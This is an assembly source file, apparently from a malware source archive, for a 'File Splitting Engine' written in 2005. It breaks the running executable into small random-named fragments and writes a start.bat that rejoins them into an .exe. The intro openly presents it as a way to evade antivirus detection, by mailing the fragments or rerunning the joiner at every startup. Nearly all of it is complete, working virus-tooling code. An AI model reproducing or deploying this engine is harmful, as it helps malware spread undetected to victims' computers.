MalwareSourceCode/Libs/Win32/Cryptor/VirTool.Win32.Cryptor.Split.asm

302 lines
9.6 KiB
NASM
Raw Normal View History

2020-10-16 20:28:58 +00:00
File Splitting Engine
by Second Part To Hell
www.spth.de.vu
spth@priest.com
written in May-June 2005
in Austria
This is just a small engine, but I'm sure it could be very useful.
What does the engine do? It splitts the current file into 3-10 byte
parts and creates a joining file (called start.bat).
To understand it's purpose, you should read my article called
"Over-File Splitting".
What could you do with the splitted files?
- You could make an archive (via own routing, possible installed WinZIP/RAR
or use the WinME+ preinstalled function [C:\WINDOWS\System32\zipfldr.dll,-10195]
to compress files.) This file now could be send out via eMail.
The advantage: No file is infected with an virus - but all together they are.
- You could save all files in a directory (Windir, system32, whatever), and
call the joining file every startup. What may happen? Virus/Worm works at
the computer, but no file is infected :)
- You could think of your own way to use this technique. Lazy ass :)
How to compile:
- Delete this intro
- Use flat assembler 1.56
Now: Much fun with it :)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; [File Splitting Engine] ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
include '..\FASM\INCLUDE\win32ax.inc'
.data
c_file_name dd 0x0
c_file_rnd_name: times 8 db 0x0
db '.tmp',0
c_file_handle dd 0x0
c_file_size dd 0x0
c_map_handle dd 0x0
c_map_pointer dd 0x0
compain_name db 'start.bat',0
compain_data dd 0x0
compain_pointer dd 0x0
compain_start db 'copy '
compain_handle dd 0x0
split_handle dd 0x0
split_counter db 0x0
rand_name_buffer: times 8 db 0x0
rnd_file_name: times 8 db 0x0
db '.tmp',0
ZERO_field dd 0x0
systemtime_struct: ; for random number
dw 0 ; wYear
dw 0 ; wMonth
dw 0 ; wDayOfWeek
dw 0 ; wDay
dw 0 ; wHour
dw 0 ; wMinute
dw 0 ; wSecond
rnd: dw 0 ; wMilliseconds
.code
start:
invoke GetCommandLine
inc eax ; Delete first "
mov ebx, eax ; Save eax
get_my_name:
inc ebx ; Get next letter
cmp byte [ebx], '.' ; Compare with '.'
jne get_my_name
mov byte [ebx+4], 0x0 ; Delete the second "
mov [c_file_name], eax ; Save the pointer
invoke DeleteFile, compain_name ; Delete the old compainer-file the file
mov ebp, 0xAAAAAAAA ; Influences the random engine
call random_name ; random name in rnd_file_name
mov esi, rnd_file_name ; From: random-name buffer
mov edi, c_file_rnd_name ; To: Buffer for this copy of the file
mov ecx, 8 ; How much: 8 letters
rep movsb ; Copy string
invoke CopyFile, [c_file_name], c_file_rnd_name, FALSE ; Copies the current file to a .tmp
invoke CreateFile, c_file_rnd_name, GENERIC_READ or GENERIC_WRITE, 0x0, 0x0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0x0 ; Open own file
mov [c_file_handle], eax ; Save the file handle
invoke GetFileSize, [c_file_handle], c_file_size ; Get the size of the file
mov [c_file_size], eax ; Low Filesize returned in eax
invoke CreateFileMapping, [c_file_handle], 0x0, PAGE_READWRITE, 0x0, [c_file_size], 0x0 ; Create a Map
mov [c_map_handle], eax ; Save the Map handle
invoke MapViewOfFile, [c_map_handle], FILE_MAP_WRITE, 0x0, 0x0, [c_file_size] ; Map view of file
mov [c_map_pointer], eax ; Save the pointer of file
invoke VirtualAlloc, 0x0, 0x120000, 0x1000, 0x4 ; Reserve Space in Memory
mov [compain_data], eax ; Save the pointer to it.
mov [compain_pointer], eax ; Save again
mov esi, compain_start ; What to write
mov edi, [compain_pointer] ; Where to write
mov ecx, 5 ; How much to write
rep movsb ; Write!
add [compain_pointer], 5 ; Get next empty byte to write
main_loop:
mov ebp, 0xAAAAAAAA ; Influences the random engine
call random_name ; random name in rnd_file_name
invoke CreateFile, rnd_file_name, GENERIC_READ or GENERIC_WRITE, 0x0, 0x0, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, 0x0
cmp eax, INVALID_HANDLE_VALUE ; If file already existed
je main_loop ; then get a new file-name
mov [split_handle], eax ; Save the file-handle
call random_number ; Get random number
xor eax, eax ; eax=0
mov al, [rand_name_buffer] ; al~=random
and al, 7 ; al= 0000 0???
add al, 3 ; At least three byte
mov [split_counter], al ; Save that bytes
sub [c_file_size], eax ; Decrease the bytes to write
invoke WriteFile, [split_handle], [c_map_pointer], eax, ZERO_field, 0x0 ; Write (1..8) byte
invoke CloseHandle, [split_handle] ; Close the file
xor eax, eax
mov al, [split_counter] ; How many bytes written
add [c_map_pointer], eax ; Add the pointer - write the next few bytes next time
mov esi, rnd_file_name ; From: Filename-buffer
mov edi, [compain_pointer] ; To: compainer-pointer
mov ecx, 12 ; 8+strlen('.tmp')
rep movsb ; Write!
add [compain_pointer], 12 ; Add 12 to pointer
mov eax, [compain_pointer] ; Pointer to eax
mov byte [eax], '+' ; Move '+' to the code's memory
inc [compain_pointer] ; Increase the pointer
cmp [c_file_size], 0 ; Compare if more bytes to write
jg main_loop ; If yes, jmp to main_loop
invoke UnmapViewOfFile, [c_map_pointer] ; Unmap View of File
invoke CloseHandle, [c_map_handle] ; Close Map
invoke CloseHandle, [c_file_handle] ; Close File
invoke DeleteFile, c_file_rnd_name ; Delete the temporary copy of the current file
invoke CreateFile, compain_name, GENERIC_READ or GENERIC_WRITE, 0x0, 0x0, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, 0x0
mov [compain_handle], eax
mov eax, [compain_pointer] ; eax=pointer
dec eax ; Delete the last '+'
mov byte [eax], 0x20 ; Add a space
inc [compain_pointer] ; Increase pointer again
mov ebp, 0xAAAAAAAA ; Influences the random engine
call random_name ; random name in rnd_file_name
mov eax, rnd_file_name ; RND-pointer in eax
add eax, 8 ; add 8 to pointer (='.' of filename)
mov dword [eax], '.exe' ; instate of '.tmp', '.exe'
dec [compain_pointer]
mov esi, rnd_file_name ; From: rnd_file_name
mov edi, [compain_pointer] ; To: compainter_pointer
mov ecx, 12 ; How much: 12 bytes
rep movsb ; Write
add [compain_pointer], 12 ; Add 12, to get the end again
mov eax, [compain_pointer] ; eax=pointer to content
mov word [eax], 0x0A0D ; Next Line
add [compain_pointer], 2
mov esi, rnd_file_name ; From: rnd_file_name
mov edi, [compain_pointer] ; To: compainter_pointer
mov ecx, 12 ; How much: 12 bytes
rep movsb ; Write
add [compain_pointer], 12 ; Add 12, to get the end again
mov eax, [compain_data]
sub [compain_pointer], eax
invoke WriteFile, [compain_handle], [compain_data], [compain_pointer], ZERO_field, 0x0 ; Write the file
invoke CloseHandle, [compain_handle]
invoke ExitProcess, 0x0
random_number:
pop edi ; Get value of stack
push edi ; Back to the stack
mov ecx, 8 ; ecx=counter
mov dh, 0xAA ; dh: changes in the function and makes the number little bit more random
mov dl, 0x87 ; same as dh
random_name_loop:
push dx ; Save dx at stack
push ecx ; Save counter at stack
call random_byte ; Random number in al
pop ecx ; get counter
xor al, cl ; Counter influences pseudo random number
pop dx ; Get dx
push ecx
xor dx, cx ; Counter influences influncing number
add dh, al ; Random number influences influencing number
sub dl, al ; Same as dh
neg dl ; Neg dl
xor dl, dh ; dl XOR dh -> more variability
xor al, dl ; random number changes
sub ax, di ; value of stack influences random number
add ax, dx ; ax+dx
mov dl, [rand_name_buffer+ecx-2]
mov dh, [rand_name_buffer+ecx-3] ; dx=???? ???? ????? ?????
sub al, dl ; al-=dl
add al, dh ; al+=dh
mov ah, dl ; ah=dl
push ax ; AX to stack
mov cl, 1 ; cl=1
or dh, cl ; dh is at least 1 (to reduce chance of result=zero)
mul dh ; AL=AX*DH
pop cx ; CX=old AX
push cx ; To stack again
add cl, al ; CL+=AL
sub cl, ah ; CL-=AH
xchg al, cl ; AL=CL
mov cx, bp ; cx=bp
mul cl ; AX=AL*CL
neg ah ; NEG AH
xor al, ah ; xor AL and AH
pop cx ; get old AX
sub cl, al ; SUB
add cl, dl ; cl+=old random number
sub al, cl ; al ~=random :)
pop ecx ; Get counter
mov [rand_name_buffer+ecx-1], al ; Save random letter
loop random_name_loop
ret
random_name:
call random_number ; Get 8 random bytes
mov ecx, 8 ; counter=8, as we want to do it 8 times
changetoletter:
mov al, [rand_name_buffer+ecx-1] ; Get a letter
mov bl, 10 ; BL=10
xor ah, ah ; AX: 0000 0000 ???? ????
div bl ; AL=rnd/10=number between 0 and 25
add al, 97 ; Add 97 for getting lowercase letters
mov [rnd_file_name+ecx-1], al ; Save random letter
loop changetoletter
ret
random_byte:
invoke GetSystemTime, systemtime_struct ; Get first number
mov ebx, [rnd-2] ; ebx=number
add ebx, edx ; Making it pseudo-independent of time
sub ebx, ecx
xor ebx, eax
xchg bl, bh
pop ecx
push ecx
neg ebx
xor ebx, ecx ; ebx=pseudo-indepentend number
invoke GetTickCount ; Get second number
xor eax, ecx ; eax=number
neg ax ; Making it pseudo-independent of time
xor eax, edx
xor ah, al
sub eax, ebp
add eax, esi ; eax=pseudo-indepentend number
xor eax, ebx ; Compain the numbers -> eax
mov ebx, eax ; Save eax
shr eax, 8 ; e-part -> ax
xor ax, bx
xor al, ah ; al=number
ret
.end start